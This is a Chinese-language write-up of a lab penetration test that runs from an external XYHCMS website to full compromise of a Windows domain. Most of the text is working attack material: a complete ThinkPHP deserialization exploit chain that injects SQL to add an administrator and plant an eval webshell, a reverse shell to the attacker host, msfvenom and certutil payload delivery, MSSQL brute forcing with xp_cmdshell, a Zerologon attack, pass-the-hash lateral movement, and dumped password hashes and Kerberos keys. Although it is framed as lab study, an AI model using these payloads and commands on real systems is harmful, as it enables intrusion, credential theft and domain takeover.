scaner 从外网到内网域渗透
scaner 从外网到内网域渗透
本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
环境配置
靶场信息
用到的虚拟机共有三个 分别是 12server-db 、12-dc 、web1
12server-db、web1 这两个可以使用桥接或者nat模式根据需求可以设置 网卡1
12-dc用的是VMnet 19 这台机子已经绑定ip
主机名 | ip | 账号和密码 |
---|---|---|
web1 | 192.168.0.160 | web1 root@123 |
db |
192.168.0.161 10.10.10.136 |
administrator qweasd666 |
ad | 10.10.10.135 |
scaner\administrator QWEasd000 scaner\db db123456 |
web1 网站 http://192.168.0.160/xyhai.php?s=/Login/index admin 123456qq
外网面板地址: http://116.27.231.161:8888/e955a525
内网面板地址: http://192.168.0.160:8888/e955a525
username: m0gy9yes
password: c693d359
db主机上的 mssql服务 sa freepass
访问 http://192.168.0.160/
网络拓扑图
外网打点
扫描端口
nmap -v -sV -A 192.168.0.160
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-01 11:28 CST
Happy 25th Birthday to Nmap, may it live to be 125!
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating Ping Scan at 11:28
Scanning 192.168.0.160 [2 ports]
Completed Ping Scan at 11:28, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.01s elapsed
Initiating Connect Scan at 11:28
Scanning 192.168.0.160 [1000 ports]
Discovered open port 8888/tcp on 192.168.0.160
Discovered open port 80/tcp on 192.168.0.160
Discovered open port 888/tcp on 192.168.0.160
Completed Connect Scan at 11:28, 4.57s elapsed (1000 total ports)
Initiating Service scan at 11:28
Scanning 3 services on 192.168.0.160
Completed Service scan at 11:29, 6.03s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.0.160.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.61s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.03s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Nmap scan report for 192.168.0.160
Host is up (0.00099s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: BC2D3C52FF445E759E5EB54AB8239359
|_http-title: \xE6\x88\x91\xE7\x9A\x84\xE7\xBD\x91\xE7\xAB\x99
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
888/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: 403 Forbidden
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
8888/tcp open http nginx
| http-title: \xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5
|_Requested resource was /login
|_http-favicon: Unknown favicon MD5: B351F027909EE2AC274599CE01D004E9
| http-methods:
|_ Supported Methods: GET POST
Service Info: Host: 0b842aa5.phpmyadminNSE: Script Post-scanning.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.85 seconds
访问 8888 端口,发现是宝塔面板。
信息收集
访问 80 端口
发现是 xyhcms ,在 https://evalshell.com/ 搜索一下,历史漏洞。
gobuster 扫描网站
简单扫描一下 获取网站目录结构
gobuster dir -u http://192.168.0.160/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x '.php' -o
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.0.160/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/09/01 11:46:11 Starting gobuster in directory enumeration mode
===============================================================
/home (Status: 200) [Size: 10964]
/archive (Status: 200) [Size: 5485]
/index (Status: 200) [Size: 10964]
/home.php (Status: 200) [Size: 10964]
/search (Status: 200) [Size: 4375]
/index.php (Status: 200) [Size: 10964]
/uploads (Status: 301) [Size: 300] [--> http://192.168.0.160/uploads/]
/0 (Status: 200) [Size: 10964]
/go (Status: 200) [Size: 0]
/index2 (Status: 200) [Size: 383]
/mobile (Status: 200) [Size: 7627]
/member (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/mobile.php (Status: 200) [Size: 7627]
/Home (Status: 200) [Size: 10964]
/Home.php (Status: 200) [Size: 10964]
/show (Status: 200) [Size: 2829]
/special (Status: 200) [Size: 4444]
/review (Status: 200) [Size: 0]
/Search (Status: 200) [Size: 4375]
/Index (Status: 200) [Size: 10964]
/Archive (Status: 200) [Size: 5485]
/guestbook (Status: 200) [Size: 5129]
/avatar (Status: 301) [Size: 299] [--> http://192.168.0.160/avatar/]
/Public (Status: 301) [Size: 299] [--> http://192.168.0.160/Public/]
/LICENSE (Status: 403) [Size: 262]
/Mobile (Status: 200) [Size: 7627]
/Mobile.php (Status: 200) [Size: 7627]
/Data (Status: 301) [Size: 297] [--> http://192.168.0.160/Data/]
/App (Status: 301) [Size: 296] [--> http://192.168.0.160/App/]
存在目录可浏览
敏感目录可浏览:
http://192.168.0.160/App/
thinkphp日志目录
http://192.168.0.160/App/Runtime/Logs/Common/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log
目录报错 得到网站路径
http://192.168.0.160/App/Runtime/common~runtime.php
Fatal error: Class 'Think\Think' not found in
/www/wwwroot/www.xycms.com/App/Runtime/common~runtime.php on line 65
xyhcms 反序列化漏洞分析
xyhcms是thinkphp3.2.3框架开发的,thinkphp的漏洞都是默认存在的(我自己测试发现不存在,可能是thinkphp的版本比较低,漏洞利用工具没有poc吧)。
痛失CVE之xyhcms(thinkphp3.2.3)反序列化: https://www.freebuf.com/articles/web/264645.html
作者说的这个版本是旧版,新版的版本已经把site.php放到一个随机值的目录下,因为网站存在目录浏览可以对其进行访问
http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php
我们先去下载一下对应的 cms 版本,进行代码审计。
idea 动态调试设置
首先开启xdebug
找到我们使用的 php 版本在 php.ini 中添加以下内容,并重新启动 apache 服务。
xdebug.remote_autostart=1
xdebug.remote_enable=On
xdebug.idekey="PHPSTORM"
IDEA 设置php以及 xdebug
调试服务器设置
设置DBGp代理
测试动态调试是否成功,我们先在代码中下一个断点,点击监听
xyhcms 反序列化入口分析
根据文章 我们搜索 unserialize 最后发现下面这个函数
/*** 得到指定cookie的值** @param string $name*/
//function get_cookie($name, $key = '@^%$y5fbl') {function get_cookie($name, $key = '') {if (!isset($_COOKIE[$name])) {return null;}$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;$value = $_COOKIE[$name];$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($value);return unserialize($value);
}
根据注释以及代码,可以发现是用来获取cookie的,其中在获取到cookie后使用 php_decrypt 解密,然后进行反序列化 return 出去
我们来理一下流程:
获取cookie --> 如果key为空使用默认的key(引入了解密类),进行解密 --> 反序列化解密后的内容并且return出去
因为网站存在目录浏览,其中的key我们可以在下面的文件中得到
http://www.xyhcms.com/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php // VjP8u3rZw
我们搜索一下 get_cookie 的用法可以看得出来普通会员在登录的时候会调用这个函数
我们去注册一个普通会员,验证一下。
xyhcms 加解密分析
class SysCrypt {private $crypt_key;// 构造函数 public function __construct() {// $this -> crypt_key = $crypt_key;// new 一个类的时候需要传入一个 key,这个key我们是知道的// 所以我们可以直接把它写死$this -> crypt_key = "VjP8u3rZw";}// 传入内容进行加密public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}// 传入内容进行解密public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}
反序列化利用添加后台管理员
还是太菜了,文章后面的看不懂了。
根据文章中的利用方法:
- 通过某处leak出目标的WEB目录**(e.g. DEBUG页面)**
- 开启恶意MySQL恶意服务端设置读取的文件为目标的数据库配置文件
- 触发反序列化
- 触发链中PDO连接的部分
- 获取到目标的数据库配置
- 使用目标的数据库配置再次出发反序列化
- 触发链中
DELETE
语句的SQL注入
文章地址:https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA
POC
<?php
namespace Think\Db\Driver{use PDO;class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true // 开启才能读取文件);protected $config = array("debug" => 1,"database" => "thinkphp3","hostname" => "127.0.0.1","hostport" => "3306","charset" => "utf8","username" => "root","password" => "");}
}namespace Think\Image\Driver{use Think\Session\Driver\Memcache;class Imagick{private $img;public function __construct(){$this->img = new Memcache();}}
}namespace Think\Session\Driver{use Think\Model;class Memcache{protected $handle;public function __construct(){$this->handle = new Model();}}
}namespace Think{use Think\Db\Driver\Mysql;class Model{protected $options = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new Mysql();$this->options['where'] = '';$this->pk = 'id';$this->data[$this->pk] = array("table" => "mysql.user where 1=updatexml(1,user(),1)#","where" => "1=1");}}
}namespace {echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}
利用恶意mysql服务器读取文件
GitHub地址:https://github.com/Gifts/Rogue-MySql-Server
修改exp中的读取文件位置为
C:\\Penetration\\TrafficTools\\phpStudyV8\\WWW\\www.xyhcms.com\\App\\Common\\Conf\\db.php
网站的简单路径可以访问以下url报错获得
/App/Api/Conf/config.php
/App/Api/Controller/ApiCommonController.class.php
/App/Common/LibTag/Other.class.php
/App/Common/Model/ArcViewModel.class.php
修改我们上面poc连接的mysql地址
<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);protected $config = array("dsn" => "mysql:host=192.168.0.23;dbname=xyhcms;port=3306","username" => "root","password" => "root");
}namespace Think;
class Model{protected $options = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new \Think\Db\Driver\Mysql();$this->options['where'] = '';$this->pk = 'luoke';$this->data[$this->pk] = array("table" => "xyh_admin_log","where" => "id=0");}
}namespace Think\Session\Driver;
class Memcache{protected $handle;public function __construct() {$this->handle = new \Think\Model();}
}namespace Think\Image\Driver;
class Imagick{private $img;public function __construct() {$this->img = new \Think\Session\Driver\Memcache();}
}namespace Common\Lib;
class SysCrypt{private $crypt_key;public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}function get_cookie($name, $key = '') {$key = 'VjP8u3rZw';$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($name);return unserialize($value);
}function set_cookie($args, $key = '') {$key = 'VjP8u3rZw';$value = serialize($args);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);return $value;
}$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);
xyhcms getshell
使用以下poc 插入管理员账号 test ,密码:123456
<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);protected $config = array("dsn" => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306","username" => "root","password" => "9a973fd7928bb3c2");
}namespace Think;
class Model{protected $options = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new \Think\Db\Driver\Mysql();$this->options['where'] = '';$this->pk = 'luoke';$this->data[$this->pk] = array("table" => "xyh_admin_log","where" => "id=0;insert into www_xycms_com.xyh_admin (id,username,password,encrypt,user_type,is_lock,login_num) VALUES (null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);");}
}namespace Think\Session\Driver;
class Memcache{protected $handle;public function __construct() {$this->handle = new \Think\Model();}
}namespace Think\Image\Driver;
class Imagick{private $img;public function __construct() {$this->img = new \Think\Session\Driver\Memcache();}
}namespace Common\Lib;
class SysCrypt{private $crypt_key;public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}function get_cookie($name) {$key = 'P4tzizR6d';$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($name);return unserialize($value);
}function set_cookie($args) {$key = 'P4tzizR6d';$value = serialize($args);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);return $value;
}use \Think\Image\Driver\Imagick;
echo set_cookie(new Imagick());
使用以下exp 插入一句话
<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);protected $config = array("dsn" => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306","username" => "root","password" => "9a973fd7928bb3c2");
}namespace Think;
class Model{protected $options = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new \Think\Db\Driver\Mysql();$this->options['where'] = '';$this->pk = 'luoke';$this->data[$this->pk] = array("table" => "xyh_admin_log","where" => "id=0; alter table xyh_guestbook add column `<script language='php'>eval(\$_POST[x]);</script>` varchar(10);");}
}namespace Think\Session\Driver;
class Memcache{protected $handle;public function __construct() {$this->handle = new \Think\Model();}
}namespace Think\Image\Driver;
class Imagick{private $img;public function __construct() {$this->img = new \Think\Session\Driver\Memcache();}
}namespace Common\Lib;
class SysCrypt{private $crypt_key;public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}function get_cookie($name) {$key = 'P4tzizR6d';$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($name);return unserialize($value);
}function set_cookie($args) {$key = 'P4tzizR6d';$value = serialize($args);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);return $value;
}use \Think\Image\Driver\Imagick;
echo set_cookie(new Imagick());
在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html 生成缓存再使用反序列化exp访问
# webshell 地址
http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/www_xycms_com.xyh_guestbook.php
linux 提权
绕过宝塔命令执行
这里我们可以看到是无法执行命令的,前期我们就知道这是一个宝塔搭建的网站,宝塔的网站对一些敏感函数禁用比较厉害
bt 禁止命令执行 可以通过 插件进行绕过 如果tmp目录下有这个文件 /tmp/php-cgi-56.sock
可以通过 PHP_FRM
进行绕过
使用绕过的 webshell 执行命令,收集一下系统信息。
unix:///tmp/php-cgi-56.sock
这里我们先反弹一个shell出来方便提权
sh -i >& /dev/tcp/192.168.0.23/6666 0>&1
使用python创建一个交互shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
使用 kali 搜索一下提权 exp
searchsploit ubuntu 5.4.0
没有找到什么有用的,我们使用比较新的提权漏洞 CVE-2021-3493,使用 webshell 上传我们的文件
chmod +x exploit.c
gcc -o exploit exploit.c
chmod +x exploit
./exploit
上线msf
生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.23 LPORT=5555 -f elf > shell.elf
设置监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.23
set lport 5555
run
上传木马使用 root 权限执行
chmod +x shell.elf
./shell.elf
成功获取到 root shell
内网渗透
查看网卡
只有存在一个网段 192.168.0.1/24
设置路由以及代理使用 fscan 扫描内网
设置路由
# 设置路由
run autoroute -s 192.168.0.1/24
# 查看路由
run autoroute -p
设置使用代理
background
use auxiliary/server/socks_proxy
设置 /etc/proxychains4.conf
socks5 127.0.0.1 1080
使用 fscan 扫描内网
proxychains4 ./fscan_amd64_1.6 -h 192.168.0.1/24
# 扫描结果
start infoscan
The current user permissions unable to send icmp packets
start ping
(icmp) Target '192.168.0.1' is alive
(icmp) Target '192.168.0.2' is alive
(icmp) Target '192.168.0.23' is alive
(icmp) Target '192.168.0.161' is alive
(icmp) Target '192.168.0.160' is alive
icmp alive hosts len is: 5
192.168.0.161:1433 open
192.168.0.161:445 open
192.168.0.1:445 open
192.168.0.161:139 open
192.168.0.161:80 open
192.168.0.160:80 open
192.168.0.161:135 open
192.168.0.1:139 open
192.168.0.1:135 open
192.168.0.160:888 open
192.168.0.23:1080 open
192.168.0.160:8888 open
alive ports len is: 12
start vulscan
[*] 192.168.0.1 WORKGROUP\PENETRATION
[+] 192.168.0.1 CVE-2020-0796 SmbGhost Vulnerable
NetInfo:
[*]192.168.0.161[->]db[->]10.10.10.136[->]192.168.0.161
[*] WebTitle:http://192.168.0.161 code:404 len:315 title:Not Found
[*] 192.168.0.161 SCANER\DB Windows Server 2012 R2 Standard 9600
NetInfo:
[*]192.168.0.1[->]penetration[->]192.168.1.8[->]192.168.10.1[->]192.168.0.1[->]10.10.10.1[->]240e:398:54a4:1a50:8038:7e62:830b:2a04[->]240e:398:54a4:1a50:b871:fbd2:3951:ed0c
[*] WebTitle:http://192.168.0.160:888 code:403 len:263 title:403 Forbidden
[*] WebTitle:http://192.168.0.160:8888 code:302 len:199 title:Redirecting...
[*] WebTitle:http://192.168.0.160:8888/login code:200 len:24 title:安全入口校验失败
[+] InfoScan:http://192.168.0.160:8888/login [宝塔-BT.cn]
[*] WebTitle:http://192.168.0.160 code:200 len:12 title:我的网站
已完成 14/14
scan end
发现一台主机 192.168.0.161 存在 mssql 服务
使用 Hydra 爆破 mssql 密码
一般情况下 mssql 的账号都为 sa,我们也可以添加账号文本进行爆破。
proxychains4 hydra -l sa -P /usr/share/wordlists/top10000.txt 192.168.0.161 mssql -vV -f
成功爆破到密码
- sa
- freepass
使用 mssqlclient.py 连接 mssql并上线cs
proxychains4 python3 mssqlclient.py sa@192.168.0.161
freepass
开启xp_cmd执行命令
enable_xp_cmdshell
xp_cmdshell whoami
cs生成木马 命令下载木马执行获得shell
监听和生成木马我就不做了。
# 下载木马
xp_cmdshell certutil -urlcache -split -f http://192.168.0.23:8080/artifact.exe c:/windows/temp/artifact.exe
# 执行木马
xp_cmdshell c:/windows/temp/artifact.exe
成功上线
使用 MS16-075 提权
使用 ms16-075 提权
进行信息收集
网卡信息
shell ipconfig
存在第二个网段 10.10.10.1/24
设置代理使用 fscan 扫描
设置 /etc/proxychains4.conf
socks4 127.0.0.1 1089
代理使用 fscan 扫描
proxychains4 ./fscan_amd64_1.6 -h 10.10.10.1/24
# 扫描结果
start infoscan
The current user permissions unable to send icmp packets
start ping
(icmp) Target '10.10.10.1' is alive
(icmp) Target '10.10.10.135' is alive
(icmp) Target '10.10.10.136' is alive
icmp alive hosts len is: 3
10.10.10.135:88 open
10.10.10.135:445 open
10.10.10.136:135 open
10.10.10.136:1433 open
10.10.10.1:139 open
10.10.10.135:135 open
10.10.10.1:135 open
10.10.10.136:80 open
10.10.10.136:445 open
10.10.10.1:445 open
10.10.10.136:139 open
10.10.10.135:139 open
10.10.10.1:443 open
alive ports len is: 13
start vulscan
[+] 10.10.10.1 CVE-2020-0796 SmbGhost Vulnerable
NetInfo:
[*]10.10.10.1[->]penetration[->]192.168.1.8[->]192.168.10.1[->]192.168.0.1[->]10.10.10.1[->]240e:398:54a4:1a50:8038:7e62:830b:2a04[->]240e:398:54a4:1a50:b871:fbd2:3951:ed0c
NetInfo:
[*]10.10.10.136[->]db[->]10.10.10.136[->]192.168.0.161
NetInfo:
[*]10.10.10.135[->]ad[->]10.10.10.135
[*] 10.10.10.136 SCANER\DB Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://10.10.10.136 code:404 len:315 title:Not Found
[*] 10.10.10.135 [+]DC __MSBROWSE__\AD Windows Server 2012 R2 Standard 9600
[*] 10.10.10.135 (Windows Server 2012 R2 Standard 9600)
[*] WebTitle:https://10.10.10.1 code:403 len:0 title:None
已完成 16/16
scan end
发现域控
域控信息收集
shell net time /domain
# 获得域控主机名 ad.scaner.sec
使用 zerologon 攻击域控
exp下载地址:https://github.com/VoidSec/CVE-2020-1472
置空域控密码
proxychains4 python3 cve-2020-1472-exploit.py -t 10.10.10.135 -n ad
攻击成功 !
secretsdump.py 读取 Hash
proxychains4 python3 secretsdump.py scaner.sec/ad\$@10.10.10.135 -no-pass
# 读取结果
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation[proxychains] Strict chain ... 127.0.0.1:1089 ... 10.10.10.135:445 ... OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1089 ... 10.10.10.135:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1089 ... 10.10.10.135:49157 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.sec\db:1614:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DB$:1615:aad3b435b51404eeaad3b435b51404ee:63dea6de1590fd5bf9e0e1531aa9d0a2:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460
krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20df
krbtgt:des-cbc-md5:91f2ab6198c1adf2
scaner.sec\db:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5
scaner.sec\db:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251
scaner.sec\db:des-cbc-md5:f2cd2c3bceae0dcd
AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930
AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948
AD$:des-cbc-md5:e6fd2cae86c479fb
DB$:aes256-cts-hmac-sha1-96:d748cb5d58bc9f2b853e89b8a2d390ed5d9d8366086c0dd0e542baf02cf37d3c
DB$:aes128-cts-hmac-sha1-96:87a5c15f59f462741136ec3fdac2e615
DB$:des-cbc-md5:e691e6139e32dfc8
[*] Cleaning up...
域控上线 cs
在上面我们已经获得了一个 Administrator 的 Hash,先上线一手cs
使用图形化上线 cs
设置转发上线
添加一个密码凭证
添加一个目标
使用 psexec64 进行横向移动
成功上线
使用命令上线 cs
同样设置转发上线
建立 IPC$ 连接
pth scaner\administrator 35dc382e7d31f6823c2e34216d4c15cb
# 测试是否建立IPC$连接
shell dir \\10.10.10.135\c$
jump 上线cs
jump psexec64 10.10.10.135 re_tcp
恢复域控密码
导出注册表
把下面内容保存为 bat 脚本,在目标机器执行。
reg save HKLM\SYSTEM c:\system.save
reg save HKLM\SAM c:\sam.save
reg save HKLM\SECURITY c:\security.save
下载注册表文件
使用 impacket 工具包中的 secretsdump.py 读取出 $MACHINE.ACC 的 Hash
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
# 执行结果
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation[*] Target system bootKey: 0x34f31a092a249b2515d55516e01ccb3a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e7d7b11f5b4352988cddcd12daa1510:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
SCANER.SEC/db:$DCC2$10240#db#b2c8206c5a3cc07e3f34b53c23ab2a26
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e95fe4b136a34299edcabc9d49068c3df6cc89c5e94a31bca5c2f9ba24eb2cd4b421b4c50b967a3d40c46413764cc9a0675ef67c1cb0d6313242b55c8a6b8ae1211e8f4b69eedb98bc6e86bd2f3076f4b7380412b6834333d6c7a24d137a2823ccd5ac0ef344c878f939e10b88eac4a097f7df7e28d5188092a2e5d11e898ac75a306e7bfd56ef842c4d701c063efbeb03f80453edadf75e07bc0c96a27ea21577e2be606348ca4a333f8b9a8c291f3b15e37d00d0a49a182cd5ed8a48bd0cb7ef968a55964d8cc7b768007bcbf1580be46a939f33dbbd4d6a70af0afff534625e1e5b419e43cb49d46b6312e6d30eba
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:63dea6de1590fd5bf9e0e1531aa9d0a2
[*] DPAPI_SYSTEM
dpapi_machinekey:0x853d47834a284f96d756c69dd569b5a0bdaed756
dpapi_userkey:0x505968a6643a760441727edff825458bf54c1ba6
